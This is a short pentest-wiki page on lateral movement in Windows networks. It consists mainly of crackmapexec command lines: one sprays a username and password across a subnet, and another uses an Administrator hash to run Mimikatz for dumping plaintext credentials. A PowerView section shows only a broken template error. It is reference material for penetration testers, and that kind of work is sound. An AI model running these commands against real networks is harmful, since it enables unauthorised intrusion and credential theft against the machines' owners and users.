Lateral Movement

From pentestwiki.org

To check if the credentials $USER / $PASSWORDS are used in more computers in the network:

$crackmapexec $IP/24 -u $USER -p $PASSWORD –lusers


Or using an Administrator hash and execute Mimikatz for plain text password gathering:

$crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/mimikatz.py


Run Powerview commands in crackmapexec:

{{Cmd}}
Parameter 1 not defined. For correct usage see template's documention.


Other techniques for lateral movements are described in the category Category:Lateral Movement